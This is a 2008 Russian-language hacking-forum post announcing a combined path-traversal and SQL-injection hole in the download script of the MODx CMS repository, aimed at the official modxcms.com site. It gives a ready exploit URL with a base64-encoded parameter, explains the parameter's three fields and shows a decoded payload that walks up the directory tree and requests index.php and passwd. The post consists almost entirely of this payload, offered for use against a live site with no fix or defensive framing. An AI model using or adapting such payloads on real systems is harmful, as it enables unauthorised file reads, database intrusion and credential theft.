13.02.2008, 18:24
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
http://www.modxcms.com
Официальный сайт CMS MODx
Существует иньекция и возможность скачать любые файлы с сайта.
Пример ссылки:
Код:
http://www.modxcms.com/assets/snippets/repository/repo_download/download.php?dwnParam=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaG9tZS9odHRwZC92aG9zdHMvbW9keGNtcy5jb20vaHR0cGRvY3N8MTAzNyBBTkQgMT0xfHJlcG9fZGNvdW50fGluZGV4LnBocHxwYXNzd2Q
Для иньекции передаём строку кодированную в base64, приблизительно такого содержания:
1| 2|repo_dcount| 3|blabla.txt
1. - путь к файлу
2. - уязвимый параметр для SQLinj
3. - имя файла который хотим скачать
пример:
../../../../../../../../../../../../../../home/httpd/vhosts/modxcms.com/httpdocs|1037 AND 1=(select 1)|repo_dcount|index.php|passwd
--------------------------------------------------
не претиндую что первый, но нашёл 30 мин назад, хотел ставить себе эту CMS....
Последний раз редактировалось big_BRAT; 13.02.2008 в 18:26..
|
|
|